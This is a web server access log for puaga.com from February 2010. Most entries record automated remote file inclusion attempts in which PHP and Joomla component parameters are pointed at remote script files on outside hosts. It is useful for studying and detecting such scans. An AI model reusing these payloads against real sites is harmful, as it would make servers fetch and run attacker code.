218.55.227.145 - - [24/Feb/2010:05:44:36 -0800] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:39 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:39 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:39 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:52 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:53 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:53 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:45:00 -0800] "GET /logs/access_100125.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:45:26 -0800] "GET /logs/access_100125.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [24/Feb/2010:05:45:59 -0800] "GET /mcf.php?content=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [24/Feb/2010:05:45:59 -0800] "GET /logs/mcf.php?content=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [24/Feb/2010:05:46:02 -0800] "GET /logs/access.log/mcf.php?content=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:46:05 -0800] "GET /logs/access_100130.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:46:56 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:46:56 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:46:56 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:47:06 -0800] "GET /logs/access_100125.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:47:13 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:47:13 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:47:13 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:47:13 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:47:41 -0800] "GET /logs/access_100125.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:47:41 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:47:41 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:47:41 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:47:51 -0800] "GET /logs/access_100130.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:47:53 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:47:53 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:47:53 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:47:54 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:47:55 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:48:18 -0800] "GET /logs/access_100130.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:48:26 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:48:26 -0800] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:48:26 -0800] "GET /logs/access_100219.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:48:29 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:48:29 -0800] "GET /logs/access_100219.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:48:29 -0800] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:48:33 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:48:33 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:48:33 -0800] "GET /logs/access_100125.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:48:39 -0800] "GET /popup_window.php?site_isp_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:48:39 -0800] "GET /logs/access_100121.log//popup_window.php?site_isp_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:48:39 -0800] "GET /logs//popup_window.php?site_isp_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:49:59 -0800] "GET /logs/access_100126.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:50:01 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:50:04 -0800] "GET /logs/access_100129.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:50:05 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:50:06 -0800] "GET /?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:50:08 -0800] "GET /logs/access_100126.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:50:25 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:50:25 -0800] "GET /?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:50:25 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:50:32 -0800] "GET /logs//write.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:50:33 -0800] "GET /write.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:50:33 -0800] "GET /logs/access_100126.log%20%20//write.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:51:01 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:51:01 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:51:01 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:51:04 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:51:04 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:51:07 -0800] "GET /?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:51:09 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:51:09 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:51:09 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:51:30 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:51:31 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:51:36 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:51:42 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:51:43 -0800] "GET /logs/access_100217.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:51:43 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:52:11 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:52:11 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:52:11 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:52:12 -0800] "GET /logs/access_100122.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:05:52:12 -0800] "GET /logs/access_100127.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:05:52:12 -0800] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:05:52:12 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:05:52:23 -0800] "GET /logs/access_100219.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:53:12 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:53:43 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:53:44 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:53:44 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:53:44 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:05:53:59 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:54:35 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:54:36 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:54:36 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:54:36 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:54:37 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:54:37 -0800] "GET /logs/access_100123.log//components/com_simpleboard/image_upload.php?sbp=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:54:38 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:54:41 -0800] "GET /logs/access_100205.log%20%20//write.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:54:56 -0800] "GET /logs/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:55:01 -0800] "GET /index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:55:01 -0800] "GET /logs/access_100119.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:55:10 -0800] "GET /logs/access_100125.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [24/Feb/2010:05:55:41 -0800] "GET /logs/access_100123.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [24/Feb/2010:05:55:42 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_100123.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [24/Feb/2010:05:55:42 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_100123.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
213.186.58.214 - - [24/Feb/2010:05:55:52 -0800] "GET /logs/access.log%20%20/mcf.php?content=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:56:39 -0800] "GET /logs/access_100202.log%20%20///modules/vwar/admin/admin.php?vwar_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:56:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:56:39 -0800] "GET /logs///modules/vwar/admin/admin.php?vwar_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:56:39 -0800] "GET /logs///modules/vwar/admin/admin.php?vwar_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:56:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:56:40 -0800] "GET /logs/access_100202.log%20%20///modules/vwar/admin/admin.php?vwar_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:56:57 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:56:57 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:56:58 -0800] "GET /logs/access_100217.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:57:28 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:57:38 -0800] "GET /logs/access_100126.log%20%20///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:57:38 -0800] "GET /logs/access_100201.log%20%20///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:05:59:23 -0800] "GET /logs/access_100218.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:05:59:23 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:05:59:24 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:05:59:29 -0800] "GET /logs/access_100121.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [24/Feb/2010:05:59:48 -0800] "GET /logs/access_100130.log/mcf.php?content=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
